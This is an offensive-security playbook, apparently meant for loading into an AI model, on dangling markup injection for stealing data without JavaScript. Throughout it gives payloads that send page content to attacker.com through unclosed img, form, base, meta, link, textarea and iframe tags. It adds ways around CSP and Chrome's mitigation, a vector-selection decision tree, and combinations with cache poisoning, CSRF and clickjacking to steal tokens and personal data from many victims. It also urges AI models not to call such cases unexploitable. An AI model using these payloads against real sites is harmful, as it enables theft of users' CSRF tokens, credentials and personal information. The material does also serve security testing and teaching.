dangling-markup-injection

SKILL: Dangling Markup Injection — Exfiltration Without JavaScript

AI LOAD INSTRUCTION: Covers dangling markup exfiltration via unclosed img/form/base/meta/link/table tags, what can be stolen (CSRF tokens, pre-filled form values, sensitive content), browser-specific behavior, and combinations with other attacks. Base models often overlook this technique entirely when CSP blocks scripts, jumping to "not exploitable" — dangling markup is the answer.

0. RELATED ROUTING

xss-cross-site-scripting when full XSS is possible (no need for dangling markup)
csp-bypass-advanced when CSP blocks JS execution — dangling markup bypasses script restrictions
csrf-cross-site-request-forgery when dangling markup steals CSRF tokens for subsequent CSRF attacks
crlf-injection when CRLF enables HTML injection in HTTP response
web-cache-deception when dangling markup + cache poisoning amplifies the attack

1. WHEN TO USE DANGLING MARKUP

You need dangling markup when ALL of these are true:

1. You have an HTML injection point (reflected or stored)
2. JavaScript execution is blocked:
   - CSP blocks inline scripts and event handlers
   - Sanitizer strips `<script>`, `onerror`, `onload`, etc.
   - WAF blocks known XSS patterns
3. The page contains sensitive data AFTER your injection point:
   - CSRF tokens
   - Pre-filled form values (email, username, API keys)
   - Session identifiers in hidden fields
   - Sensitive user content

Core insight: You don't need JavaScript to exfiltrate data — you just need the browser to make a request that includes the data in the URL.

2. CORE TECHNIQUE

Inject an unclosed HTML tag with a `src`, `href`, `action`, or similar attribute pointing to your server. The unclosed attribute quote "consumes" all subsequent page content until the browser finds a matching quote.

```html
Page before injection:
  <div>Hello USER_INPUT</div>
  <form>
    <input type="hidden" name="csrf" value="SECRET_TOKEN_123">
    <input type="text" name="email" value="user@target.com">
  </form>

Injected payload:
  <img src="https://attacker.com/collect?

Resulting HTML:
  <div>Hello <img src="https://attacker.com/collect?</div>
  <form>
    <input type="hidden" name="csrf" value="SECRET_TOKEN_123">
    <input type="text" name="email" value="user@target.com">
  </form>
  ...rest of page until next matching quote (")...
```

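The browser treats everything from `https://attacker.com/collect?` up to the next matching quote character as the URL, so any markup in that span is sent to `attacker.com` in the query string. Which data is captured depends on where that next quote falls. The sample page quotes its own attributes with `"`, so the double-quoted payload above stops at the first `"` in `type="hidden"`, while a single-quoted payload (see 6.1) keeps consuming past the CSRF token and email value until the first `'` later in the page.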
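The quote-matching rule can be checked with a small simulation. The sketch below is a simplified model, not a real HTML parser: it assumes the attribute value ends at the next identical quote character and that a tag whose quote is never closed is discarded. The function name `simulate_capture` and the trailing `<p>` line with an apostrophe are hypothetical additions for illustration.

```python
from typing import Optional


def simulate_capture(markup_after_injection: str, quote: str) -> Optional[str]:
    """Return the text an unclosed attribute opened with `quote` would swallow.

    Simplified model: the value ends at the next identical quote character.
    If no such quote exists, the tag never completes, so nothing is captured.
    """
    end = markup_after_injection.find(quote)
    return None if end == -1 else markup_after_injection[:end]


# Markup following the injection point in the sample page, plus one
# hypothetical line containing an apostrophe.
REST_OF_PAGE = (
    '</div>\n'
    '<form>\n'
    '  <input type="hidden" name="csrf" value="SECRET_TOKEN_123">\n'
    '  <input type="text" name="email" value="user@target.com">\n'
    '</form>\n'
    "<p>Don't share this page</p>\n"
)

double_quoted = simulate_capture(REST_OF_PAGE, '"')
single_quoted = simulate_capture(REST_OF_PAGE, "'")

print(repr(double_quoted))                    # ends right after type=
print("SECRET_TOKEN_123" in single_quoted)    # the token is inside the capture
```

In this model the double-quoted payload captures nothing useful, while the single-quoted one reaches the token only because a `'` appears later in the page.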

3. EXFILTRATION VECTORS

3.1 Image Tag (Most Common)

```html
<!-- Double-quote context -->
<img src="https://attacker.com/collect?

<!-- Single-quote context -->
<img src='https://attacker.com/collect?

<!-- Backtick context (IE only, legacy) -->
<img src=`https://attacker.com/collect?
```

The browser sends a GET request to `attacker.com` with all consumed content in the query string.

Blocked by: `img-src` CSP directive

3.2 Form Action Hijack

```html
<form action="https://attacker.com/collect">
<button>Click to continue</button>
<!--
```

If the page has form elements after the injection point, the next `</form>` closes the attacker's form. All input fields in between become part of the attacker's form and are submitted to the attacker on user interaction.

Blocked by: `form-action` CSP directive

Trick: The injected button is optional. If the page already has a submit button the user is expected to click, or JavaScript that auto-submits the form, the hijacked form is submitted without any extra lure.
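The form-adoption behaviour can be modelled in a few lines. The sketch below is a simplified illustration built on Python's standard `html.parser`; it assumes the HTML parsing rule that a `<form>` start tag is ignored while another form is still open. The class name `FormOwnership`, the host `attacker.example`, and the `/account/update` path are hypothetical, and the sample omits the trailing `<!--` from the payload above.

```python
from html.parser import HTMLParser


class FormOwnership(HTMLParser):
    """Record which form action each named field would be submitted to."""

    def __init__(self) -> None:
        super().__init__()
        self.form_open = False
        self.open_action = None   # action of the currently open form
        self.owners = {}          # field name -> form action

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            if not self.form_open:          # nested <form> start tags are ignored
                self.form_open = True
                self.open_action = attrs.get("action")
        elif tag in ("input", "textarea", "select") and self.form_open:
            if attrs.get("name"):
                self.owners[attrs["name"]] = self.open_action

    def handle_endtag(self, tag):
        if tag == "form":
            self.form_open = False
            self.open_action = None


PAGE = """
<form action="https://attacker.example/collect">
<button>Click to continue</button>
<form action="/account/update" method="post">
  <input type="hidden" name="csrf" value="SECRET_TOKEN_123">
  <input type="text" name="email" value="user@target.com">
</form>
"""

parser = FormOwnership()
parser.feed(PAGE)
print(parser.owners)
```

Both fields end up owned by the injected form because the page's own `<form>` start tag is dropped while the injected one is open.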

3.3 Base Tag Hijack

```html
<base href="https://attacker.com/">
```

All subsequent relative URLs on the page resolve to the attacker's server:

- `<script src="/js/app.js">` → loads `https://attacker.com/js/app.js`
- `<a href="/profile">` → links to `https://attacker.com/profile`
- `<form action="/submit">` → submits to `https://attacker.com/submit`

Blocked by: `base-uri` CSP directive
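The effect of a changed base URL can be reproduced with standard URL resolution. This is a minimal sketch using `urllib.parse.urljoin`; the original page URL `https://target.com/account/settings`, the CDN URL, and the helper name `resolve_all` are assumptions for illustration.

```python
from urllib.parse import urljoin

ORIGINAL_BASE = "https://target.com/account/settings"  # hypothetical page URL
INJECTED_BASE = "https://attacker.com/"                 # value of the injected <base href>

PAGE_URLS = ["/js/app.js", "/profile", "/submit", "https://cdn.example/lib.js"]


def resolve_all(base: str, urls: list) -> dict:
    """Resolve each URL against `base` the way a relative reference is resolved."""
    return {url: urljoin(base, url) for url in urls}


before = resolve_all(ORIGINAL_BASE, PAGE_URLS)
after = resolve_all(INJECTED_BASE, PAGE_URLS)

for url in PAGE_URLS:
    print(f"{url}: {before[url]} -> {after[url]}")
```

Absolute URLs are unchanged by the new base, so only relative references on the page are redirected.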

3.4 Meta Refresh Redirect

```html
<meta http-equiv="refresh" content="0;url=https://attacker.com/collect?
```

Redirects the entire page to the attacker's server with consumed page content in the URL.

Blocked by: the `navigate-to` CSP directive in principle, but it was only a proposal and mainstream browsers do not enforce it. Some browsers reportedly ignore meta refresh when CSP is present.

3.5 Link/Stylesheet Exfiltration

```html
<link rel="stylesheet" href="https://attacker.com/collect?
```

The browser requests the URL as a CSS resource, leaking consumed content.

Blocked by: `style-src` CSP directive

3.6 Table Background (Legacy)

```html
<table background="https://attacker.com/collect?
```

Works in older browsers that support the `background` attribute on table elements.

Blocked by: `img-src` CSP directive

3.7 Video/Audio Poster

```html
<video poster="https://attacker.com/collect?
<audio src="https://attacker.com/collect?
```

Blocked by: `img-src` (for `<video poster>`) and `media-src` (for `<audio src>`) CSP directives
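The "Blocked by" notes in this section can be combined into a quick audit of a policy. The sketch below is a rough helper under stated assumptions: it only reports vectors whose governing directive is entirely absent, it does not evaluate whether a source list would allow a particular host, and the names `VECTOR_DIRECTIVE` and `unrestricted_vectors` are hypothetical. It relies on the CSP rule that `form-action` and `base-uri` do not fall back to `default-src`.

```python
# Vector -> CSP directive that governs it, taken from the notes in this section.
VECTOR_DIRECTIVE = {
    "img src": "img-src",
    "form action": "form-action",
    "base href": "base-uri",
    "link stylesheet": "style-src",
    "table background": "img-src",
    "video poster": "img-src",
    "audio src": "media-src",
}

# Directives that do NOT inherit from default-src.
NO_FALLBACK = {"form-action", "base-uri"}


def parse_csp(header: str) -> dict:
    """Split a Content-Security-Policy header into {directive: [sources]}."""
    policy = {}
    for part in header.split(";"):
        tokens = part.split()
        if tokens:
            policy.setdefault(tokens[0].lower(), tokens[1:])
    return policy


def governing_sources(policy: dict, directive: str):
    """Return the source list that applies, or None if nothing restricts it."""
    if directive in policy:
        return policy[directive]
    if directive not in NO_FALLBACK and "default-src" in policy:
        return policy["default-src"]
    return None


def unrestricted_vectors(header: str) -> list:
    """List vectors for which the policy sets no restriction at all."""
    policy = parse_csp(header)
    return sorted(
        vector
        for vector, directive in VECTOR_DIRECTIVE.items()
        if governing_sources(policy, directive) is None
    )


print(unrestricted_vectors("default-src 'self'; script-src 'none'"))
```

A policy that sets only `default-src` and `script-src` still leaves the form and base vectors open, which is why those two directives need to be set explicitly.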

4. WHAT CAN BE STOLEN

| Target Data | How It Appears in Page | Steal Technique |
| --- | --- | --- |
| CSRF token | `<input type="hidden" name="csrf" value="...">` | Dangling `<img src=` before the form |
| Pre-filled email | `<input value="user@example.com">` | Dangling tag before the input |
| API keys in page | `var apiKey = "sk-..."` in inline script | Dangling tag before the script block |
| Session ID in hidden field | `<input name="session" value="...">` | Dangling tag before the form |
| Auto-filled passwords | Browser auto-fills password field | `<form action=attacker>` with matching input names |
| OAuth state/tokens | In URL parameters or hidden form fields | Dangling tag on authorization page |
| Internal URLs/paths | Links, script sources, API endpoints | `<base>` tag hijack captures all relative URLs |

5. BROWSER-SPECIFIC BEHAVIOR

| Browser | Behavior |
| --- | --- |
| Chrome/Chromium | Since Chrome 60, blocks requests whose URL contains both `<` and a raw newline, which stops most multi-line `<img src=` captures. `<form action>` and `<base>` remain usable; test `<link>` separately. |
| Firefox | More permissive with dangling markup in image sources. Allows newlines in attribute values. |
| Safari | Similar to Chrome's restrictions. May handle some edge cases differently. |
| Edge (Chromium) | Same as Chrome behavior. |

Chrome Mitigation Detail

Chrome blocks the navigation or resource load when the URL attribute value contains both of the following:

- A `<` character (indicates HTML tag consumption)
- A raw newline character (`\n` or `\r`)

Bypass: Use `<form action>` instead of `<img src>`. Combined with a `<textarea>`, the captured markup travels in the form body rather than in a URL, so the check does not apply.
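As a rough way to predict whether a captured span would trip this mitigation, the condition can be written as a predicate. This is an approximation and not Chrome's actual implementation: it assumes the block fires only when the URL contains both a `<` and a raw newline or tab, and the function name `chrome_would_block` is hypothetical.

```python
def chrome_would_block(url_attribute_value: str) -> bool:
    """Approximate Chrome's dangling-markup check on a URL attribute value.

    Assumption: the load is blocked only when the value contains BOTH a '<'
    and a raw newline or tab (characters that URL parsing would strip).
    """
    has_angle_bracket = "<" in url_attribute_value
    has_stripped_whitespace = any(ch in url_attribute_value for ch in "\n\r\t")
    return has_angle_bracket and has_stripped_whitespace


samples = {
    "multi-line capture": "https://attacker.com/collect?</div>\n<form>",
    "plain URL": "https://attacker.com/collect?id=1",
    "single-line markup": "https://attacker.com/collect?<b>hi</b>",
}

for label, value in samples.items():
    print(label, chrome_would_block(value))
```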

6. ADVANCED TECHNIQUES

6.1 Selective Consumption

Choose the quote type strategically: if the page uses `"` for attributes, inject with `'` (and vice versa) to precisely control where consumption stops.

6.2 Textarea + Form Combo

`<form action="https://attacker.com/collect"><textarea name="data">`

An unclosed `<textarea>` eats all subsequent HTML as plaintext; form submission sends it to the attacker.

6.3 Comment / Style Dangling

- `<!--` without a closing `-->` consumes all content (no exfil, but hides page content)
- An unclosed `<style>` treats the rest of the page as CSS; combine with `@import url("https://attacker.com/?` for exfil

6.4 Window.name via iframe

`<iframe src="https://target.com/page" name="`

The `name` attribute consumes content, and `window.name` persists across origins after navigation.

7. LIMITATIONS

| Limitation | Detail |
| --- | --- |
| Same-origin content only | Dangling markup only captures content from the same HTTP response |
| Quote matching | Consumption stops at the next matching quote character, so it may not reach the target data |
| CSP img-src/form-action | Strict CSP can block most exfiltration vectors |
| Chrome's dangling markup mitigation | Blocks `<img src=` URLs that contain both `<` and a raw newline |
| Injection point must be before target data | Can only capture content that appears after the injection in HTML source order |
| Content encoding | URL-unsafe characters in captured content may be mangled |
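The content-encoding limitation is easier to see with a concrete transformation. The sketch below approximates, under simplifying assumptions, how URL parsing treats captured text that lands in a query string: raw tabs and newlines are dropped, everything after the first `#` becomes a fragment that is not sent, and a small set of characters is percent-encoded. It is not a full URL parser, and the function name `as_sent_in_query` is hypothetical.

```python
def as_sent_in_query(captured: str) -> str:
    """Approximate what reaches the server when `captured` lands in a URL query."""
    # URL parsing drops raw tabs and newlines.
    stripped = "".join(ch for ch in captured if ch not in "\t\n\r")
    # Everything after the first '#' is the fragment, which is never sent.
    sent = stripped.split("#", 1)[0]
    encoded = []
    for ch in sent:
        # Space, quotes, angle brackets, controls and non-ASCII get percent-encoded.
        if ch in " \"<>'" or ord(ch) < 0x20 or ord(ch) > 0x7E:
            encoded.append("".join(f"%{byte:02X}" for byte in ch.encode("utf-8")))
        else:
            encoded.append(ch)
    return "".join(encoded)


sample = '</div>\n<input value="a b">#frag'
print(as_sent_in_query(sample))
```

A `#` in the captured markup, for example in a colour value or an anchor link, therefore truncates what the receiving server sees.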

8. COMBINATION ATTACKS

8.1 Dangling Markup + Open Redirect

1. Inject <img src="https://target.com/redirect?url=https://attacker.com/collect?
2. Open redirect on target.com makes the request "same-origin" for some CSP checks
3. Redirect sends captured data to attacker

8.2 Dangling Markup + Cache Poisoning

1. Find reflected HTML injection point
2. Inject dangling markup payload
3. If response is cached, ALL users see the dangling markup
4. Tokens/data from all victims exfiltrated

This turns a reflected injection into a stored/persistent attack.

8.3 Dangling Markup + CSRF

1. Use dangling markup to steal CSRF token from page
2. Use stolen token to perform CSRF attack
3. Allows CSRF even when tokens are properly implemented

8.4 Dangling Markup + Clickjacking

1. Inject <form action="https://attacker.com/collect"><textarea name="data">
2. Frame the page (if frame-ancestors allows)
3. Trick user into clicking "Submit" via clickjacking overlay
4. Form submits all captured page content to attacker

9. DANGLING MARKUP DECISION TREE

HTML injection exists but XSS is blocked (CSP/sanitizer/WAF)?
│
├── Identify injection context
│   ├── Inside attribute value? → Break out first: "><img src="https://attacker.com/collect?
│   ├── Inside tag content? → Inject directly: <img src="https://attacker.com/collect?
│   └── Inside script block? → Close script first: </script><img src="...
│
├── What sensitive data exists AFTER injection point?
│   ├── CSRF tokens → HIGH VALUE: steal token → CSRF attack
│   ├── User PII (email, name) → data theft
│   ├── API keys / secrets → account compromise
│   ├── No sensitive data after injection → dangling markup not useful here
│   └── Check different pages — injection may be on a page with sensitive data
│
├── Choose exfiltration vector based on CSP
│   ├── No CSP / lax CSP → <img src="...  (simplest)
│   ├── img-src restricted?
│   │   ├── form-action unrestricted? → <form action="attacker"><textarea name=d>
│   │   ├── base-uri unrestricted? → <base href="attacker">
│   │   └── style-src unrestricted? → <link rel=stylesheet href="...
│   ├── Strict CSP on all directives?
│   │   ├── meta refresh? → <meta http-equiv="refresh" content="0;url=attacker?
│   │   ├── DNS prefetch? → <link rel=dns-prefetch href="//data.attacker.com">
│   │   └── Window.name via iframe? → <iframe name="...
│   └── Nothing works? → dangling markup blocked, try other approaches
│
├── Handle Chrome's dangling markup mitigation
│   ├── Target uses Chrome? → Avoid <img src= with < or newlines
│   ├── Use <form action=> instead (not blocked)
│   ├── Use <base href=> (not blocked)
│   └── Test in Firefox as fallback (more permissive)
│
├── Choose quote type for maximum capture
│   ├── Target data uses double quotes? → Inject with single quote: <img src='...
│   ├── Target data uses single quotes? → Inject with double quote: <img src="...
│   └── Mixed quotes? → Test both, see which captures more useful data
│
└── Amplification
    ├── Response cached? → Poison cache → steal from multiple victims
    ├── Stored injection? → Every page view exfiltrates
    └── Reflected only? → Deliver via phishing link

10. TRICK NOTES — WHAT AI MODELS MISS

1. Dangling markup is THE answer when CSP blocks scripts but HTML injection exists. Models trained on XSS often conclude "not exploitable" when CSP is strict, but dangling markup doesn't need JavaScript.
2. Chrome's mitigation is not universal: `<img src=` captures that span both `<` and a newline are blocked, but `<form action=`, `<base href=`, and `<meta http-equiv=refresh>` are reported as NOT affected. Always try alternative vectors.
3. Quote type selection is critical: If the page uses `"` for attributes, inject with `'` (or vice versa) to control exactly where consumption stops. Wrong quote type = capturing useless content or nothing.
4. Injection point placement matters enormously: The injection must appear BEFORE the target data in the HTML source. If the CSRF token is above your injection point, dangling markup cannot capture it.
5. `<textarea>` is the most underrated vector: An unclosed textarea eats ALL subsequent HTML as plaintext. Combined with form action hijack, it's the most reliable method when img-src is restricted.
6. Window.name persists across origins: If you can inject an iframe, the `name` attribute technique is powerful because `window.name` survives cross-origin navigation, which makes it a rare cross-origin data channel.
7. DNS prefetch exfiltration can work even under strict CSP: `<link rel=dns-prefetch href="//stolen-data.attacker.com">` triggers a DNS lookup that CSP may not block. Each DNS label is limited to 63 characters and the full hostname to 253, which is still enough for most tokens.
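The DNS size limits translate into simple arithmetic. The sketch below estimates whether a value of a given byte length fits in one hostname, assuming the standard limits of 63 characters per label and 253 for the whole name, and assuming the value is base32-encoded because hostnames are case-insensitive. The function name `fits_in_hostname` and the suffix `attacker.example` are hypothetical.

```python
import math

MAX_LABEL_LEN = 63   # limit for a single DNS label
MAX_NAME_LEN = 253   # limit for the whole hostname, dots included


def fits_in_hostname(token_bytes: int, suffix: str) -> bool:
    """Estimate whether `token_bytes` of data fits in front of `suffix`."""
    encoded_len = math.ceil(token_bytes * 8 / 5)      # unpadded base32 characters
    labels = math.ceil(encoded_len / MAX_LABEL_LEN)   # labels needed for the data
    total = encoded_len + labels + len(suffix)        # one dot after each data label
    return total <= MAX_NAME_LEN


print(fits_in_hostname(32, "attacker.example"))    # a 32-byte token
print(fits_in_hostname(200, "attacker.example"))   # a 200-byte blob
```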
